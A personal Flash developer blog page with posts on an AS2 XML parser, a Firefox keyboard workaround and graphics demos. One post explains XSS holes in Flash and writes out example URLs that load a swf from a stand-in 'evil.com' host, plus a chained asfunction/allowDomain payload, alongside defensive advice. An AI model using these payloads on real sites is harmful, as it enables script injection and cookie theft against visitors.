logga


xml reading in as2

Xml reading with the built-in functions in as2 is not the funniest things to do. In as3 it’s a lot better as you probably know. To make it easier in as2 I made a xmlparser that makes it possible to read the xml as a dom-tree. There are a lot of similar classes and some of them are probably better then mine or at least more advanced. This class is only for reading since you almost never alter xmls and seldom write them. The class is about 4 years old but I use it in almost every as2 project I thought I could share it.

source:
xmldomdemo.rar

usage:
import se.superkrut.util.XMLDom;
var xml:XML = new XML();
xml.ignoreWhite = true;
xml.onLoad = function(){
var xmldom:XMLDom = new XMLDom(this);
trace("first:"+xmldom.root.language.swedish.text.bye.value);
trace("second:"+xmldom.root.language.swedish.text[1].value);
trace("attribute:" + xmldom.root.language.attributes.id);
}
xml.load("language.xml");

where language.xml is:

<?xml version="1.0" ?>
<root>
<language id="swedish">
<text id="hello">hej</text>
<text id="bye">hej då</text>
</language>
</root>

all instances have a __resolve function that maps unknown calls to the first position in the child array. Example
xmldom.root.language is the same as xmldom.root[0].language

the attribute id is automatically mapped to a property in the instance. Example:
language.swedish is mapped from the id attribute.

No Comments to “xml reading in as2”

xss vulnerabilities in flash

I saw this article linked from slashdot about xss vulnerabilities in flash. The article doesn’t say much about how the hacks are performed and I have not read the book but I can guess. Since it’s an xss exploit it probably about tricking a person to enter a page with some additional get variables that is passed to a swf on the page with flashvars or as get variables. Its really nothing new what I can see, maybe point 3 below is a litle bit unkown. But since a book (Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions) about it is coming it might be a lot of people that is going to try it out. The security holes can be used different depending on the setup.

1. Passing the url to load
php: host.swf?load=$_GET['load_url'];
as2: mc.loadMovie(_root.load_url);

This is most common on small applications as image viewers or preloaders. A variant of this is passing a variable to a xml with urls to load for instance playlists to images lideshows. Sometimes all the get variables are added to an existing getstring with a possible result:

php: host.swf?load=main.swf&text=hey&load=http%3A%2F%2Fevil.com%2Fhack.swf

which results in that the later is set as _root.load and a swf from another domain is loaded.

with System.security.allowDomain("*"); the loaded swf can execute a lot of funny stuff with the same privilege as the root swf. For instance steal and send cookies with javascript and since you can write code that crashed the browser you could probably do some really ugly arbitrary tricks. The allowDomain(”*”) is quite common in more complex systems where content are shared between domains and content are moved between domains during development, testing and authoring.

2. passing texts to be displayed.
php: host.swf?text=$_GET['text'];
as2: tf.htmlText = _root.text;

it’s not that common to pass the texts to be displayed as a get variable. It much more common thing is to pass a url to a xml with text to display. Since htmlText can contain asfunction you can trick the player to run code. Which make the trick as serious as the first example, possibly more since you can’t stop it with a restrictive allowDomain().

I’m not going to go into details about it, examples can be found at
http://events.ccc.de/camp/2007/Fahrplan/attachments/1320-FlashSec.pdf
http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt

3. change the excution of the code.
You can inject variables that prevent the creation of classes in the memory.
host.swf?SomeClass=foo
As2 compiles to as1 which is a scriptlanguage and the creation of classes looks like
if(_global.SomeClass == undefined){
_global.SomeClass = ...
}

The variables sent to the swf makes the test if a class is added to memory to true and the real class is not used. And the lack of the right class can be used to make an attack. It might be possible to do some serious things with this but you have to decompile and find the right spots in the swf. An example could be removal of validation, if containsScriptSchemes is undefined all calls to it will be undefined which evaluates as false.

A possible scenario to sum it all up could be, use 3 to make it possible to run asfunctions described in 2. The asfunction to rewrite the allowDomain policy and then load a swf with full control from a remote domain, 1. I have not tried it, but something like this could be possible. It might sound hard to archive but the execution order fits quite good. A possible hack against a suitable target would be (with some escapes):

host.swf?as2DataValidation=foo&text='><img src='asfunction:System.security.allowDomain,"*"//.jpg'&load=http://evil.c/evil.swf

Well whats the solution then:

- The loudest on slashdot disables flash and call it evil. I don’t promote that solution since flash puts food on my table.

- Adobe wants you to install flashplayer 9.0.115.0. I don’t think its going to be done over the night unless youtube and myspace forces us all.

Since you can’t blame the stupid users clicking on all links sent to them its better to blame the lazy programmers and start there.

- Don’t send all the getvars directly to the swf. This is the central part of the exploit but it’s not suitable all the time.

- If you need to send all get variables, send them as one variable instead and write a function to retrieve them. host.swf?args=[text,hey,load,main.swf]

- Validate all texts sent to the swf before using them. Download http://code.google.com/p/flash-validators/ and use containsScriptSchemes to check for scripts. If you want to use asfunctions in htmlText you should hard code it and replace it into the text. But be aware of point 3 above.

- Be more restrictive with System.security.allowDomain(); We have all cursed the sandbox, but it keeps you safe.

- Consider not to use allowscriptaccess="always" attribute in the embed tag.

- use the __resolve to catch calls to undefined. This can result in unexpected behavior and might not help at all.

I might be all wrong about the security hole they are going to publish but the above might be useful anyway.

No Comments to “xss vulnerabilities in flash”

7 inputfields and transparency in firefox for windows

There are alot of bugs related to wmode= transparancy or opaque for firefox in windows, in linux it doesn’t seems to work at all. This particular bug is that you can’t write @ on a swedish keyboard in input textfields. Normaly you write @ with Alt Gr+2, but if you try a normal 2 is written. Faults happends for most Alt Gr codes as £${[]}. A quick workaround is to use the english Shift+2 but most people don’t know that. Or you can paste it in from elsewhere. Another workaround a friend of mine gave me is to pretype the @ in the textfield and let the user write his email around it. There are some other workarounds, but none of them was nice enough.

without the fix

with the fix

My solution registers a keyListener if a textfield is Selected and stores the key-code sequences in a keybuffer. If 17, 18, 50 is pressed an @ is written instead of the 2. 17, 18 is for Alt Gr and 50 is for the 2 key. Other key-code sequences are mapped to other signs. If another textfield or something else is in focus the listeners are removed. The class might need some localisation changes to work on different keyboard layouts.

The class has a very simple setup.

InputFix.initialize();

Once initialized it works on all textfields in the application. One important thing is that you have to import the font for the numbers even if you not is going to use them. It the chars are missing the onChanged event on the textfield are not executed.

A preferred solution is to send the browser as a flashvars and only initialize it for firefox for windows.

source: text, package

7 Comments to “inputfields and transparency in firefox for windows”

soundscape

Every dot has an own beat and the application plays the sounds of the five closest dots to the mouse. I have a lot of more ideas on this concept but I don’t have the time to code them. So instead of waiting I publish this early beta instead. Thanks albin for the sounds.

source: soundscape0.5.zip
compile with: /usr/bin/mtasc -header 800:600:25 -main -swf deploy/soundscape.swf -cp /media/sda3/www/soundscape/source soundMix/Initializer (or similar)

No Comments to “soundscape”

2 Morph car

All large car company pages has a rotating car on there site. They are either made of images put together in a rotation, a flv playing a rotation or in some rare cases papervision. Here is an idea about morphing between images. Its too CPU heavy to use in a real application unless some angles are pre-rendered and used instead of calculate in each frame.

The two images are faded and morphed together. If you move the mouse to the top of the application you will see the morphing grid.

source

2 Comments to “Morph car”

Videoflag

the main purpose of this application is to show my 3D-engine. First I wanted to take movies directly from youtube or similar. But since you cant read bitmapdata from flv I had to convert to swf. There are some serverside tricks to make it possible but my cheep hotel don’t give me the opportunity.

It uses the now classical triangle trick together with the transform-matrix. It hangs ones in a while, specially when it lying down. I’m planing to fix it.

The flag effect is made by some sinus-functions. The engine don’t have a depth manager which must be implemented do be able to use it in more advanced applications. A more serious 3d-engine is the papervision3d engine. Or consider using processing

source

No Comments to “Videoflag”